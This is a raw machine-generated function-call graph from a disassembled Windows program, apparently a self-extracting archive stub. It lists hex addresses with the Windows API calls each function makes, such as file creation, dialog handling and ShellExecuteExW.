23423->23417 23424->23420 23425->23421 23426->23344 23428 543ff4 ___scrt_initialize_default_local_stdio_options 23427->23428 23431 565759 23428->23431 23434 563837 23431->23434 23435 563877 23434->23435 23436 56385f 23434->23436 23435->23436 23438 56387f 23435->23438 23451 56895a 20 API calls _abort 23436->23451 23440 563dd6 __fassign 38 API calls 23438->23440 23439 563864 23452 568839 26 API calls pre_c_initialization 23439->23452 23442 56388f 23440->23442 23453 563da1 20 API calls 2 library calls 23442->23453 23444 55ec4a DloadUnlock 5 API calls 23446 543ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23444->23446 23445 563907 23454 564186 51 API calls 3 library calls 23445->23454 23446->23354 23449 56386f 23449->23444 23450 563912 23455 563e59 20 API calls _free 23450->23455 23451->23439 23452->23449 23453->23445 23454->23450 23455->23449 23480 559d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23456->23480 23458 559d21 23459 559d2d 23458->23459 23481 559d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23458->23481 23459->23362 23459->23363 23459->23364 23462 559e70 23461->23462 23463 559e3e SizeofResource 23461->23463 23462->23355 23463->23462 23464 559e52 LoadResource 23463->23464 23464->23462 23465 559e63 LockResource 23464->23465 23465->23462 23466 559e77 GlobalAlloc 23465->23466 23466->23462 23467 559e92 GlobalLock 23466->23467 23468 559f21 GlobalFree 23467->23468 23469 559ea1 __vswprintf_c_l 23467->23469 23468->23462 23470 559ea9 CreateStreamOnHGlobal 23469->23470 23471 559ec1 23470->23471 23472 559f1a GlobalUnlock 23470->23472 23482 559d7b GdipAlloc 23471->23482 23472->23468 23475 559eef GdipCreateHBITMAPFromBitmap 23476 559f05 23475->23476 23476->23472 23477->23366 23478->23370 23479->23372 23480->23458 23481->23459 23483 559d8d 23482->23483 23484 559d9a 23482->23484 23486 559b0f 23483->23486 23484->23472 23484->23475 23484->23476 23487 559b37 GdipCreateBitmapFromStream 23486->23487 23488 559b30 GdipCreateBitmapFromStreamICM 23486->23488 23489 559b3c 23487->23489 23488->23489 23489->23484 23491 54d34b _wcschr __EH_prolog 23490->23491 23492 54d37a GetModuleFileNameW 23491->23492 23493 54d3ab 23491->23493 23494 54d394 23492->23494 23532 5499b0 23493->23532 23494->23493 23497 54d407 23543 565a90 26 API calls 3 library calls 23497->23543 23500 553781 76 API calls 23502 54d3db 23500->23502 23501 54d41a 23544 565a90 26 API calls 3 library calls 23501->23544 23502->23497 23502->23500 23525 54d627 23502->23525 23506 54d42c 23512 54d563 23506->23512 23506->23525 23545 549e40 23506->23545 23560 549bf0 23506->23560 23568 549d30 77 API calls 23506->23568 23508 54d57d ___std_exception_copy 23509 549bf0 80 API calls 23508->23509 23508->23525 23511 54d5a6 ___std_exception_copy 23509->23511 23511->23525 23528 54d5b2 ___std_exception_copy 23511->23528 23570 55137a MultiByteToWideChar 23511->23570 23512->23525 23569 549d30 77 API calls 23512->23569 23514 54d72b 23571 54ce72 76 API calls 23514->23571 23516 54da0a 23576 54ce72 76 API calls 23516->23576 23518 54d9fa 23518->23375 23519 54d771 23572 565a90 26 API calls 3 library calls 23519->23572 23521 54d742 23521->23519 23523 553781 76 API calls 23521->23523 23522 54d78b 23573 565a90 26 API calls 3 library calls 23522->23573 23523->23521 23553 549653 23525->23553 23526 551596 WideCharToMultiByte 23526->23528 23528->23514 23528->23516 23528->23518 23528->23525 23528->23526 23574 54dd6b 50 API calls __vsnprintf 23528->23574 23575 5658d9 26 API calls 3 library calls 23528->23575 23531 54d32f 23530->23531 23531->23378 23533 5499ba 23532->23533 23534 549a39 CreateFileW 23533->23534 23535 549a59 GetLastError 23534->23535 23536 549aaa 23534->23536 23577 54b66c 23535->23577 23538 549ae1 23536->23538 23540 549ac7 SetFileTime 23536->23540 23538->23502 23539 549a79 23539->23536 23541 549a7d CreateFileW GetLastError 23539->23541 23540->23538 23542 549aa1 23541->23542 23542->23536 23543->23501 23544->23506 23546 549e64 SetFilePointer 23545->23546 23547 549e53 23545->23547 23548 549e9d 23546->23548 23549 549e82 GetLastError 23546->23549 23547->23548 23590 546fa5 75 API calls 23547->23590 23548->23506 23549->23548 23551 549e8c 23549->23551 23551->23548 23591 546fa5 75 API calls 23551->23591 23554 549677 23553->23554 23555 549688 23553->23555 23554->23555 23556 549683 23554->23556 23557 54968a 23554->23557 23555->23375 23592 549817 23556->23592 23597 5496d0 23557->23597 23562 549c03 23560->23562 23563 549bfc 23560->23563 23562->23563 23564 549c9e 23562->23564 23566 549cc0 23562->23566 23612 54984e 23562->23612 23563->23506 23564->23563 23624 546f6b 75 API calls 23564->23624 23566->23563 23567 54984e 5 API calls 23566->23567 23567->23566 23568->23506 23569->23508 23570->23528 23571->23521 23572->23522 23573->23525 23574->23528 23575->23528 23576->23518 23578 54b679 23577->23578 23586 54b683 23578->23586 23587 54b806 CharUpperW 23578->23587 23580 54b692 23588 54b832 CharUpperW 23580->23588 23582 54b6a1 23583 54b6a5 23582->23583 23584 54b71c GetCurrentDirectoryW 23582->23584 23589 54b806 CharUpperW 23583->23589 23584->23586 23586->23539 23587->23580 23588->23582 23589->23586 23590->23546 23591->23548 23593 549824 23592->23593 23594 549820 23592->23594 23593->23594 23603 54a12d 23593->23603 23594->23555 23598 5496dc 23597->23598 23599 5496fa 23597->23599 23598->23599 23601 5496e8 CloseHandle 23598->23601 23600 549719 23599->23600 23611 546e3e 74 API calls 23599->23611 23600->23555 23601->23599 23604 55e360 23603->23604 23605 54a13a DeleteFileW 23604->23605 23606 54984c 23605->23606 23607 54a14d 23605->23607 23606->23555 23608 54b66c 2 API calls 23607->23608 23609 54a161 23608->23609 23609->23606 23610 54a165 DeleteFileW 23609->23610 23610->23606 23611->23600 23613 549867 ReadFile 23612->23613 23614 54985c GetStdHandle 23612->23614 23615 549880 23613->23615 23616 5498a0 23613->23616 23614->23613 23625 549989 23615->23625 23616->23562 23618 549887 23619 549895 23618->23619 23620 5498b7 23618->23620 23621 5498a8 GetLastError 23618->23621 23623 54984e GetFileType 23619->23623 23620->23616 23622 5498c7 GetLastError 23620->23622 23621->23616 23621->23620 23622->23616 23622->23619 23623->23616 23624->23563 23626 549992 GetFileType 23625->23626 23627 54998f 23625->23627 23628 5499a0 23626->23628 23627->23618 23628->23618 23630 55e24f ___std_exception_copy 23629->23630 23631 558854 23630->23631 23635 5671ad 7 API calls 2 library calls 23630->23635 23636 55ecce RaiseException __CxxThrowException@8 new 23630->23636 23637 55ecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23630->23637 23631->22997 23635->23630 23639 567430 ___FrameUnwindToState 23638->23639 23640 567448 23639->23640 23642 56757e _abort GetModuleHandleW 23639->23642 23660 56a3f1 EnterCriticalSection 23640->23660 23643 56743c 23642->23643 23643->23640 23672 5675c2 GetModuleHandleExW 23643->23672 23644 5674ee 23661 56752e 23644->23661 23647 567450 23647->23644 23649 5674c5 23647->23649 23680 567f30 20 API calls _abort 23647->23680 23650 5674dd 23649->23650 23655 5681f1 _abort 5 API calls 23649->23655 23656 5681f1 _abort 5 API calls 23650->23656 23651 567537 23681 571a19 5 API calls DloadUnlock 23651->23681 23652 56750b 23664 56753d 23652->23664 23655->23650 23656->23644 23660->23647 23682 56a441 LeaveCriticalSection 23661->23682 23663 567507 23663->23651 23663->23652 23683 56a836 23664->23683 23667 56756b 23670 5675c2 _abort 8 API calls 23667->23670 23668 56754b GetPEB 23668->23667 23669 56755b GetCurrentProcess TerminateProcess 23668->23669 23669->23667 23671 567573 ExitProcess 23670->23671 23673 56760f 23672->23673 23674 5675ec GetProcAddress 23672->23674 23676 567615 FreeLibrary 23673->23676 23677 56761e 23673->23677 23675 567601 23674->23675 23675->23673 23676->23677 23678 55ec4a DloadUnlock 5 API calls 23677->23678 23679 567628 23678->23679 23679->23640 23680->23649 23682->23663 23684 56a85b 23683->23684 23688 56a851 23683->23688 23685 56a458 ___FrameUnwindToState 5 API calls 23684->23685 23685->23688 23686 55ec4a DloadUnlock 5 API calls 23687 567547 23686->23687 23687->23667 23687->23668 23688->23686 24792 55eac0 27 API calls pre_c_initialization 24843 5597c0 10 API calls 24794 569ec0 21 API calls 24844 56b5c0 GetCommandLineA GetCommandLineW 24795 55a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24845 56ebc1 21 API calls __vswprintf_c_l 24848 55ebf7 20 API calls 23798 55e1f9 23799 55e203 23798->23799 23800 55df59 ___delayLoadHelper2@8 19 API calls 23799->23800 23801 55e210 23800->23801 23803 55aee0 23804 55aeea __EH_prolog 23803->23804 23966 54130b 23804->23966 23807 55af2c 23811 55afa2 23807->23811 23812 55af39 23807->23812 23840 55af18 23807->23840 23808 55b5cb 24031 55cd2e 23808->24031 23815 55b041 GetDlgItemTextW 23811->23815 23821 55afbc 23811->23821 23816 55af75 23812->23816 23817 55af3e 23812->23817 23813 55b5f7 23819 55b611 GetDlgItem SendMessageW 23813->23819 23820 55b600 SendDlgItemMessageW 23813->23820 23814 55b5e9 SendMessageW 23814->23813 23815->23816 23818 55b077 23815->23818 23822 55af96 KiUserCallbackDispatcher 23816->23822 23816->23840 23826 54ddd1 53 API calls 23817->23826 23817->23840 23823 55b08f GetDlgItem 23818->23823 23964 55b080 23818->23964 24049 559da4 GetCurrentDirectoryW 23819->24049 23820->23819 23825 54ddd1 53 API calls 23821->23825 23822->23840 23828 55b0c5 SetFocus 23823->23828 23829 55b0a4 SendMessageW SendMessageW 23823->23829 23830 55afde SetDlgItemTextW 23825->23830 23831 55af58 23826->23831 23827 55b641 GetDlgItem 23832 55b664 SetWindowTextW 23827->23832 23833 55b65e 23827->23833 23834 55b0d5 23828->23834 23847 55b0ed 23828->23847 23829->23828 23835 55afec 23830->23835 24071 541241 SHGetMalloc 23831->24071 24050 55a2c7 GetClassNameW 23832->24050 23833->23832 23839 54ddd1 53 API calls 23834->23839 23835->23840 23846 55aff9 GetMessageW 23835->23846 23837 55b56b 23843 54ddd1 53 API calls 23837->23843 23845 55b0df 23839->23845 23841 55af5f 23841->23840 23842 55af63 SetDlgItemTextW 23841->23842 23842->23840 23848 55b57b SetDlgItemTextW 23843->23848 24072 55cb5a 23845->24072 23846->23840 23851 55b010 IsDialogMessageW 23846->23851 23856 54ddd1 53 API calls 23847->23856 23852 55b58f 23848->23852 23851->23835 23855 55b01f TranslateMessage DispatchMessageW 23851->23855 23858 54ddd1 53 API calls 23852->23858 23854 55b0e6 23976 54a04f 23854->23976 23855->23835 23857 55b124 23856->23857 23861 54400a _swprintf 51 API calls 23857->23861 23862 55b5b8 23858->23862 23859 55bdf5 98 API calls 23860 55b6af 23859->23860 23864 54ddd1 53 API calls 23860->23864 23866 55b6df 23860->23866 23865 55b136 23861->23865 23867 54ddd1 53 API calls 23862->23867 23869 55b6c2 SetDlgItemTextW 23864->23869 23870 55cb5a 16 API calls 23865->23870 23871 55bdf5 98 API calls 23866->23871 23902 55b797 23866->23902 23867->23840 23876 54ddd1 53 API calls 23869->23876 23870->23854 23877 55b6fa 23871->23877 23872 55b847 23878 55b850 EnableWindow 23872->23878 23879 55b859 23872->23879 23873 55b174 GetLastError 23874 55b17f 23873->23874 23982 55a322 SetCurrentDirectoryW 23874->23982 23882 55b6d6 SetDlgItemTextW 23876->23882 23888 55b70c 23877->23888 23903 55b731 23877->23903 23878->23879 23880 55b876 23879->23880 24090 5412c8 GetDlgItem EnableWindow 23879->24090 23887 55b89d 23880->23887 23894 55b895 SendMessageW 23880->23894 23881 55b195 23885 55b1ac 23881->23885 23886 55b19e GetLastError 23881->23886 23882->23866 23884 55b78a 23890 55bdf5 98 API calls 23884->23890 23893 55b227 23885->23893 23897 55b237 23885->23897 23899 55b1c4 GetTickCount 23885->23899 23886->23885 23887->23840 23895 54ddd1 53 API calls 23887->23895 24088 559635 32 API calls 23888->24088 23889 55b86c 24091 5412c8 GetDlgItem EnableWindow 23889->24091 23890->23902 23893->23897 23898 55b46c 23893->23898 23894->23887 23901 55b8b6 SetDlgItemTextW 23895->23901 23896 55b725 23896->23903 23905 55b407 23897->23905 23906 55b24f GetModuleFileNameW 23897->23906 23991 5412e6 GetDlgItem ShowWindow 23898->23991 23907 54400a _swprintf 51 API calls 23899->23907 23900 55b825 24089 559635 32 API calls 23900->24089 23901->23840 23902->23872 23902->23900 23909 54ddd1 53 API calls 23902->23909 23903->23884 23910 55bdf5 98 API calls 23903->23910 23905->23816 23918 54ddd1 53 API calls 23905->23918 24082 54eb3a 80 API calls 23906->24082 23913 55b1dd 23907->23913 23909->23902 23915 55b75f 23910->23915 23911 55b47c 23992 5412e6 GetDlgItem ShowWindow 23911->23992 23983 54971e 23913->23983 23914 55b844 23914->23872 23915->23884 23919 55b768 DialogBoxParamW 23915->23919 23917 55b275 23921 54400a _swprintf 51 API calls 23917->23921 23922 55b41b 23918->23922 23919->23816 23919->23884 23920 55b486 23923 54ddd1 53 API calls 23920->23923 23924 55b297 CreateFileMappingW 23921->23924 23925 54400a _swprintf 51 API calls 23922->23925 23927 55b490 SetDlgItemTextW 23923->23927 23928 55b2f9 GetCommandLineW 23924->23928 23960 55b376 __vswprintf_c_l 23924->23960 23929 55b439 23925->23929 23993 5412e6 GetDlgItem ShowWindow 23927->23993 23935 55b30a 23928->23935 23939 54ddd1 53 API calls 23929->23939 23930 55b203 23931 55b215 23930->23931 23932 55b20a GetLastError 23930->23932 23937 549653 79 API calls 23931->23937 23932->23931 23933 55b381 ShellExecuteExW 23955 55b39e 23933->23955 24083 55ab2e SHGetMalloc 23935->24083 23937->23893 23938 55b4a2 SetDlgItemTextW GetDlgItem 23941 55b4d7 23938->23941 23942 55b4bf GetWindowLongW SetWindowLongW 23938->23942 23939->23816 23940 55b326 24084 55ab2e SHGetMalloc 23940->24084 23994 55bdf5 23941->23994 23942->23941 23946 55b332 24085 55ab2e SHGetMalloc 23946->24085 23947 55b3e1 23947->23905 23954 55b3f7 UnmapViewOfFile CloseHandle 23947->23954 23948 55bdf5 98 API calls 23950 55b4f3 23948->23950 24019 55d0f5 23950->24019 23951 55b33e 24086 54ecad 80 API calls ___scrt_fastfail 23951->24086 23954->23905 23955->23947 23958 55b3cd Sleep 23955->23958 23957 55b355 MapViewOfFile 23957->23960 23958->23947 23958->23955 23959 55bdf5 98 API calls 23963 55b519 23959->23963 23960->23933 23961 55b542 24087 5412c8 GetDlgItem EnableWindow 23961->24087 23963->23961 23965 55bdf5 98 API calls 23963->23965 23964->23816 23964->23837 23965->23961 23967 541314 23966->23967 23968 54136d 23966->23968 23969 54137a 23967->23969 24092 54da98 62 API calls 2 library calls 23967->24092 24093 54da71 GetWindowLongW SetWindowLongW 23968->24093 23969->23807 23969->23808 23969->23840 23972 541336 23972->23969 23973 541349 GetDlgItem 23972->23973 23973->23969 23974 541359 23973->23974 23974->23969 23975 54135f SetWindowTextW 23974->23975 23975->23969 23979 54a059 23976->23979 23977 54a0ea 23978 54a207 9 API calls 23977->23978 23980 54a113 23977->23980 23978->23980 23979->23977 23979->23980 24094 54a207 23979->24094 23980->23873 23980->23874 23982->23881 23984 549728 23983->23984 23985 549792 CreateFileW 23984->23985 23986 549786 23984->23986 23985->23986 23987 5497e4 23986->23987 23988 54b66c 2 API calls 23986->23988 23987->23930 23989 5497cb 23988->23989 23989->23987 23990 5497cf CreateFileW 23989->23990 23990->23987 23991->23911 23992->23920 23993->23938 23995 55bdff __EH_prolog 23994->23995 23996 55b4e5 23995->23996 24126 55aa36 23995->24126 23996->23948 23999 55aa36 ExpandEnvironmentStringsW 24008 55be36 _wcsrchr 23999->24008 24000 55c11d SetWindowTextW 24000->24008 24005 55bf0b SetFileAttributesW 24007 55bfc5 GetFileAttributesW 24005->24007 24018 55bf25 ___scrt_fastfail 24005->24018 24007->24008 24010 55bfd7 DeleteFileW 24007->24010 24008->23996 24008->23999 24008->24000 24008->24005 24011 55c2e7 GetDlgItem SetWindowTextW SendMessageW 24008->24011 24014 55c327 SendMessageW 24008->24014 24130 5517ac CompareStringW 24008->24130 24131 559da4 GetCurrentDirectoryW 24008->24131 24133 54a52a 7 API calls 24008->24133 24134 54a4b3 FindClose 24008->24134 24135 55ab9a 76 API calls ___std_exception_copy 24008->24135 24136 5635de 24008->24136 24010->24008 24012 55bfe8 24010->24012 24011->24008 24013 54400a _swprintf 51 API calls 24012->24013 24015 55c008 GetFileAttributesW 24013->24015 24014->24008 24015->24012 24016 55c01d MoveFileW 24015->24016 24016->24008 24017 55c035 MoveFileExW 24016->24017 24017->24008 24018->24007 24018->24008 24132 54b4f7 52 API calls 2 library calls 24018->24132 24020 55d0ff __EH_prolog 24019->24020 24151 54fead 24020->24151 24022 55d130 24155 545c59 24022->24155 24024 55d14e 24159 547c68 24024->24159 24028 55d1a1 24176 547cfb 24028->24176 24030 55b504 24030->23959 24032 55cd38 24031->24032 24033 559d1a 4 API calls 24032->24033 24034 55cd3d 24033->24034 24035 55cd45 GetWindow 24034->24035 24036 55b5d1 24034->24036 24035->24036 24039 55cd65 24035->24039 24036->23813 24036->23814 24037 55cd72 GetClassNameW 24620 5517ac CompareStringW 24037->24620 24039->24036 24039->24037 24040 55cd96 GetWindowLongW 24039->24040 24041 55cdfa GetWindow 24039->24041 24040->24041 24042 55cda6 SendMessageW 24040->24042 24041->24036 24041->24039 24042->24041 24043 55cdbc GetObjectW 24042->24043 24621 559d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24043->24621 24046 55cdd3 24622 559d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24046->24622 24623 559f5d 8 API calls ___scrt_fastfail 24046->24623 24048 55cde4 SendMessageW DeleteObject 24048->24041 24049->23827 24051 55a2e8 24050->24051 24056 55a30d 24050->24056 24624 5517ac CompareStringW 24051->24624 24053 55a312 SHAutoComplete 24054 55a31b 24053->24054 24058 55a7c3 24054->24058 24055 55a2fb 24055->24056 24057 55a2ff FindWindowExW 24055->24057 24056->24053 24056->24054 24057->24056 24059 55a7cd __EH_prolog 24058->24059 24060 541380 82 API calls 24059->24060 24061 55a7ef 24060->24061 24625 541f4f 24061->24625 24064 55a809 24066 541631 84 API calls 24064->24066 24065 55a818 24067 541951 126 API calls 24065->24067 24068 55a814 24066->24068 24069 55a83a __vswprintf_c_l ___std_exception_copy 24067->24069 24068->23859 24068->23860 24069->24068 24070 541631 84 API calls 24069->24070 24070->24068 24071->23841 24073 55ac74 5 API calls 24072->24073 24074 55cb66 GetDlgItem 24073->24074 24075 55cbbc SendMessageW SendMessageW 24074->24075 24076 55cb88 24074->24076 24077 55cc17 SendMessageW SendMessageW SendMessageW 24075->24077 24078 55cbf8 24075->24078 24079 55cb93 ShowWindow SendMessageW SendMessageW 24076->24079 24080 55cc6d SendMessageW 24077->24080 24081 55cc4a SendMessageW 24077->24081 24078->24077 24079->24075 24080->23854 24081->24080 24082->23917 24083->23940 24084->23946 24085->23951 24086->23957 24087->23964 24088->23896 24089->23914 24090->23889 24091->23880 24092->23972 24093->23969 24095 54a214 24094->24095 24096 54a238 24095->24096 24097 54a22b CreateDirectoryW 24095->24097 24115 54a180 24096->24115 24097->24096 24099 54a26b 24097->24099 24102 54a27a 24099->24102 24107 54a444 24099->24107 24101 54a27e GetLastError 24101->24102 24102->23979 24103 54b66c 2 API calls 24105 54a254 24103->24105 24105->24101 24106 54a258 CreateDirectoryW 24105->24106 24106->24099 24106->24101 24108 55e360 24107->24108 24109 54a451 SetFileAttributesW 24108->24109 24110 54a494 24109->24110 24111 54a467 24109->24111 24110->24102 24112 54b66c 2 API calls 24111->24112 24113 54a47b 24112->24113 24113->24110 24114 54a47f SetFileAttributesW 24113->24114 24114->24110 24118 54a194 24115->24118 24119 55e360 24118->24119 24120 54a1a1 GetFileAttributesW 24119->24120 24121 54a1b2 24120->24121 24122 54a189 24120->24122 24123 54b66c 2 API calls 24121->24123 24122->24101 24122->24103 24124 54a1c6 24123->24124 24124->24122 24125 54a1ca GetFileAttributesW 24124->24125 24125->24122 24127 55aa40 24126->24127 24128 55aaf3 ExpandEnvironmentStringsW 24127->24128 24129 55ab16 24127->24129 24128->24129 24129->24008 24130->24008 24131->24008 24132->24018 24133->24008 24134->24008 24135->24008 24137 568606 24136->24137 24138 568613 24137->24138 24139 56861e 24137->24139 24140 568518 __vswprintf_c_l 21 API calls 24138->24140 24141 568626 24139->24141 24147 56862f ___FrameUnwindToState 24139->24147 24146 56861b 24140->24146 24144 5684de _free 20 API calls 24141->24144 24142 568634 24149 56895a 20 API calls _abort 24142->24149 24143 568659 HeapReAlloc 24143->24146 24143->24147 24144->24146 24146->24008 24147->24142 24147->24143 24150 5671ad 7 API calls 2 library calls 24147->24150 24149->24146 24150->24147 24152 54feba 24151->24152 24180 541789 24152->24180 24154 54fed2 24154->24022 24156 54fead 24155->24156 24157 541789 76 API calls 24156->24157 24158 54fed2 24157->24158 24158->24024 24160 547c72 __EH_prolog 24159->24160 24197 54c827 24160->24197 24162 547c8d 24163 55e24a new 8 API calls 24162->24163 24164 547cb7 24163->24164 24203 55440b 24164->24203 24167 547ddf 24168 547de9 24167->24168 24172 547e53 24168->24172 24232 54a4c6 24168->24232 24170 547ec4 24175 547f06 24170->24175 24238 546dc1 74 API calls 24170->24238 24172->24170 24174 54a4c6 8 API calls 24172->24174 24210 54837f 24172->24210 24174->24172 24175->24028 24177 547d09 24176->24177 24179 547d10 24176->24179 24178 551acf 84 API calls 24177->24178 24178->24179 24181 54179f 24180->24181 24192 5417fa __vswprintf_c_l 24180->24192 24182 5417c8 24181->24182 24193 546e91 74 API calls __vswprintf_c_l 24181->24193 24183 541827 24182->24183 24189 5417e7 ___std_exception_copy 24182->24189 24186 5635de 22 API calls 24183->24186 24185 5417be 24194 546efd 75 API calls 24185->24194 24188 54182e 24186->24188 24188->24192 24196 546efd 75 API calls 24188->24196 24189->24192 24195 546efd 75 API calls 24189->24195 24192->24154 24193->24185 24194->24182 24195->24192 24196->24192 24198 54c831 __EH_prolog 24197->24198 24199 55e24a new 8 API calls 24198->24199 24200 54c874 24199->24200 24201 55e24a new 8 API calls 24200->24201 24202 54c898 24201->24202 24202->24162 24204 554415 __EH_prolog 24203->24204 24205 55e24a new 8 API calls 24204->24205 24206 554431 24205->24206 24207 547ce6 24206->24207 24209 5506ba 78 API calls 24206->24209 24207->24167 24209->24207 24211 548389 __EH_prolog 24210->24211 24239 541380 24211->24239 24213 5483a4 24247 549ef7 24213->24247 24218 5483cf 24220 5483d3 24218->24220 24228 54a4c6 8 API calls 24218->24228 24231 54846e 24218->24231 24374 54bac4 CompareStringW 24218->24374 24370 541631 24220->24370 24224 5484ce 24273 541f00 24224->24273 24227 5484d9 24227->24220 24277 543aac 24227->24277 24287 54857b 24227->24287 24228->24218 24266 548517 24231->24266 24233 54a4db 24232->24233 24234 54a4df 24233->24234 24608 54a5f4 24233->24608 24234->24168 24236 54a4ef 24236->24234 24237 54a4f4 FindClose 24236->24237 24237->24234 24238->24175 24240 541385 __EH_prolog 24239->24240 24241 54c827 8 API calls 24240->24241 24242 5413bd 24241->24242 24243 55e24a new 8 API calls 24242->24243 24246 541416 ___scrt_fastfail 24242->24246 24244 541403 24243->24244 24245 54b07d 82 API calls 24244->24245 24244->24246 24245->24246 24246->24213 24248 549f0e 24247->24248 24249 5483ba 24248->24249 24375 546f5d 76 API calls 24248->24375 24249->24220 24251 5419a6 24249->24251 24252 5419b0 __EH_prolog 24251->24252 24263 541a00 24252->24263 24265 5419e5 24252->24265 24376 54709d 24252->24376 24254 541b50 24379 546dc1 74 API calls 24254->24379 24256 543aac 97 API calls 24260 541bb3 24256->24260 24257 541b60 24257->24256 24257->24265 24258 541bff 24264 541c32 24258->24264 24258->24265 24380 546dc1 74 API calls 24258->24380 24260->24258 24261 543aac 97 API calls 24260->24261 24261->24260 24262 543aac 97 API calls 24262->24264 24263->24254 24263->24257 24263->24265 24264->24262 24264->24265 24265->24218 24267 548524 24266->24267 24398 550c26 GetSystemTime SystemTimeToFileTime 24267->24398 24269 548488 24269->24224 24270 551359 24269->24270 24400 55d51a 24270->24400 24274 541f05 __EH_prolog 24273->24274 24276 541f39 24274->24276 24408 541951 24274->24408 24276->24227 24278 543abc 24277->24278 24279 543ab8 24277->24279 24280 543af7 24278->24280 24281 543ae9 24278->24281 24279->24227 24543 5427e8 97 API calls 3 library calls 24280->24543 24282 543b29 24281->24282 24542 543281 85 API calls 3 library calls 24281->24542 24282->24227 24285 543af5 24285->24282 24544 54204e 74 API calls 24285->24544 24288 548585 __EH_prolog 24287->24288 24289 5485be 24288->24289 24294 5485c2 24288->24294 24567 5584bd 99 API calls 24288->24567 24290 5485e7 24289->24290 24289->24294 24296 54867a 24289->24296 24291 548609 24290->24291 24290->24294 24568 547b66 151 API calls 24290->24568 24291->24294 24569 5584bd 99 API calls 24291->24569 24294->24227 24296->24294 24545 545e3a 24296->24545 24298 548705 24298->24294 24551 54826a 24298->24551 24301 548875 24302 54a4c6 8 API calls 24301->24302 24305 5488e0 24301->24305 24302->24305 24304 54c991 80 API calls 24313 54893b _memcmp 24304->24313 24555 547d6c 24305->24555 24306 548a70 24307 548b43 24306->24307 24314 548abf 24306->24314 24311 548b9e 24307->24311 24322 548b4e 24307->24322 24308 548a69 24572 541f94 74 API calls 24308->24572 24321 548b30 24311->24321 24575 5480ea 96 API calls 24311->24575 24312 548b9c 24315 549653 79 API calls 24312->24315 24313->24294 24313->24304 24313->24306 24313->24308 24570 548236 82 API calls 24313->24570 24571 541f94 74 API calls 24313->24571 24316 54a180 4 API calls 24314->24316 24314->24321 24315->24294 24319 548af7 24316->24319 24318 549653 79 API calls 24318->24294 24319->24321 24573 549377 96 API calls 24319->24573 24320 548c09 24324 549989 GetFileType 24320->24324 24333 548c74 24320->24333 24369 5491c1 ___InternalCxxFrameHandler 24320->24369 24321->24312 24321->24320 24322->24312 24574 547f26 100 API calls ___InternalCxxFrameHandler 24322->24574 24323 54aa88 8 API calls 24326 548cc3 24323->24326 24328 548c4c 24324->24328 24329 54aa88 8 API calls 24326->24329 24328->24333 24576 541f94 74 API calls 24328->24576 24347 548cd9 24329->24347 24331 548c62 24577 547061 75 API calls 24331->24577 24333->24323 24334 548d9c 24335 548df7 24334->24335 24336 548efd 24334->24336 24337 548e69 24335->24337 24338 548e07 24335->24338 24340 548f23 24336->24340 24341 548f0f 24336->24341 24357 548e27 24336->24357 24339 54826a CharUpperW 24337->24339 24343 548e4d 24338->24343 24351 548e15 24338->24351 24344 548e84 24339->24344 24342 552c42 75 API calls 24340->24342 24345 5492e6 121 API calls 24341->24345 24346 548f3c 24342->24346 24343->24357 24580 547907 108 API calls 24343->24580 24353 548eb4 24344->24353 24354 548ead 24344->24354 24344->24357 24345->24357 24583 5528f1 121 API calls 24346->24583 24347->24334 24578 549b21 SetFilePointer GetLastError SetEndOfFile 24347->24578 24579 541f94 74 API calls 24351->24579 24582 549224 94 API calls __EH_prolog 24353->24582 24581 547698 84 API calls ___InternalCxxFrameHandler 24354->24581 24360 54904b 24357->24360 24584 541f94 74 API calls 24357->24584 24359 549156 24362 54a444 4 API calls 24359->24362 24359->24369 24360->24359 24361 549104 24360->24361 24360->24369 24561 549ebf SetEndOfFile 24360->24561 24562 549d62 24361->24562 24363 5491b1 24362->24363 24363->24369 24585 541f94 74 API calls 24363->24585 24366 54914b 24368 5496d0 75 API calls 24366->24368 24368->24359 24369->24318 24371 541643 24370->24371 24600 54c8ca 24371->24600 24374->24218 24375->24249 24381 5416d2 24376->24381 24378 5470b9 24378->24263 24379->24265 24380->24264 24382 5416e8 24381->24382 24393 541740 __vswprintf_c_l 24381->24393 24383 541711 24382->24383 24394 546e91 74 API calls __vswprintf_c_l 24382->24394 24385 541767 24383->24385 24386 54172d ___std_exception_copy 24383->24386 24388 5635de 22 API calls 24385->24388 24386->24393 24396 546efd 75 API calls 24386->24396 24387 541707 24395 546efd 75 API calls 24387->24395 24390 54176e 24388->24390 24390->24393 24397 546efd 75 API calls 24390->24397 24393->24378 24394->24387 24395->24383 24396->24393 24397->24393 24399 550c56 __vswprintf_c_l 24398->24399 24399->24269 24401 55d527 24400->24401 24402 54ddd1 53 API calls 24401->24402 24403 55d54a 24402->24403 24404 54400a _swprintf 51 API calls 24403->24404 24405 55d55c 24404->24405 24406 55cb5a 16 API calls 24405->24406 24407 551372 24406->24407 24407->24224 24409 541961 24408->24409 24410 54195d 24408->24410 24412 541896 24409->24412 24410->24276 24413 5418a8 24412->24413 24414 5418e5 24412->24414 24415 543aac 97 API calls 24413->24415 24420 543f18 24414->24420 24418 5418c8 24415->24418 24418->24410 24423 543f21 24420->24423 24421 543aac 97 API calls 24421->24423 24422 541906 24422->24418 24425 541e00 24422->24425 24423->24421 24423->24422 24437 55067c 24423->24437 24426 541e0a __EH_prolog 24425->24426 24445 543b3d 24426->24445 24428 541e34 24429 5416d2 76 API calls 24428->24429 24431 541ebb 24428->24431 24430 541e4b 24429->24430 24473 541849 76 API calls 24430->24473 24431->24418 24433 541e63 24435 541e6f 24433->24435 24474 55137a MultiByteToWideChar 24433->24474 24475 541849 76 API calls 24435->24475 24438 550683 24437->24438 24440 55069e 24438->24440 24443 546e8c RaiseException __CxxThrowException@8 24438->24443 24441 5506af SetThreadExecutionState 24440->24441 24444 546e8c RaiseException __CxxThrowException@8 24440->24444 24441->24423 24443->24440 24444->24441 24446 543b47 __EH_prolog 24445->24446 24447 543b5d 24446->24447 24448 543b79 24446->24448 24504 546dc1 74 API calls 24447->24504 24450 543dc2 24448->24450 24453 543ba5 24448->24453 24521 546dc1 74 API calls 24450->24521 24452 543b68 24452->24428 24453->24452 24476 552c42 24453->24476 24455 543c26 24457 543cb1 24455->24457 24472 543c1d 24455->24472 24507 54c991 24455->24507 24456 543c22 24456->24455 24506 542034 76 API calls 24456->24506 